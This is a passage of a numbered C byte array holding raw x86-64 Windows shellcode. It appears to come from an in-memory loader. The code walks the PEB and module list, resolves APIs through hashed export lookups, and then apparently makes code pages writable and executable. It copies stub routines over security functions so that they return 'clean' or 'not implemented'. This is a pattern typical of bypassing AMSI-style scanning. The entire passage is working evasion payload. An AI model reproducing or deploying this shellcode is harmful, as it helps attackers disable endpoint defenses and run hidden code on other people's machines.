1027 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1028 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0,
1029 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
1030 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1031 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1032 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1033 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1034 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1035 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1036 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60,
1037 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
1038 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00,
1039 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08,
1040 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00,
1041 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
1042 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b,
1043 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1044 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
1045 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48,
1046 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
1047 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4,
1048 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1049 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b,
1050 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8,
1051 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
1052 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00,
1053 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03,
1054 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c,
1055 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1056 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01,
1057 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01,
1058 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00,
1059 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2,
1060 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1061 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1062 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1063 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85,
1064 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95,
1065 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48,
1066 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85,
1067 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01,
1068 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1069 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1070 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60,
1071 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60,
1072 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80,
1073 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01,
1074 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1075 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
1076 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1077 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00,
1078 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce,
1079 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b,
1080 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1081 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
1082 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1083 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00,
1084 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1085 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48,
1086 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1087 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f,
1088 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00,
1089 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1090 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86,
1091 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
1092 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00,
1093 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
1094 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1095 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b,
1096 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00,
1097 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85,
1098 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48,
1099 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1100 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76,
1101 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1102 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01,
1103 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c,
1104 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6,
1105 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1106 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01,
1107 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01,
1108 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1109 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1110 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc,
1111 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00,
1112 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1113 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
1114 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85,
1115 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85,
1116 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20,
1117 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
1118 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b,
1119 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55,
1120 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
1121 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01,
1122 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00,
1123 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd,
1124 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01,
1125 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85,
1126 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d,
1127 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1128 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45,
1129 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00,
1130 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48,
1131 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1132 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48,
1133 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45,
1134 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55,
1135 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
1136 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48,
1137 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
1138 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48,
1139 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1140 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1141 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1142 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1143 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1144 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3,
1145 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1146 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30,
1147 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1148 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b,
1149 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1150 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45,
1151 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1152 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45,
1153 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00,
1154 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1155 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00,
1156 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1157 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1158 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48,
1159 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1160 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00,
1161 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1162 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1163 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1164 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1165 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49,
1166 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1,
1167 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1168 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4,
1169 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1170 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00,
1171 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1172 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1173 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48,
1174 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1175 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00,
1176 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1177 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0,
1178 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
1179 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55,
1180 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d,
1181 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48,
1182 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b,
1183 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0,
1184 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55,
1185 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1186 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7,
1187 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3,
1188 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45,
1189 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1190 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00,
1191 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1192 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3,
1193 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10,
1194 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10,
1195 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
1196 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8,
1197 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1198 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1199 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1200 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1201 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff,
1202 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2,
1203 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1204 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48,
1205 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d,
1206 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40,
1207 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1208 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b,
1209 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff,
1210 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1211 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c,
1212 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45,
1213 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1214 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1215 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1216 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe,
1217 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2,
1218 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1219 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10,
1220 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1221 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1222 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
1223 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48,
1224 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00,
1225 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b,
1226 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d,
1227 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40,
1228 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
1229 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c,
1230 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb,
1231 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10,
1232 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50,
1233 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b,
1234 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1235 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1236 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1237 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b,
1238 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48,
1239 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45,
1240 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0,
1241 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1242 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89,
1243 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b,
1244 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f,
1245 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00,
1246 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48,
1247 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff,
1248 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16,
1249 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30,
1250 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e,
1251 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
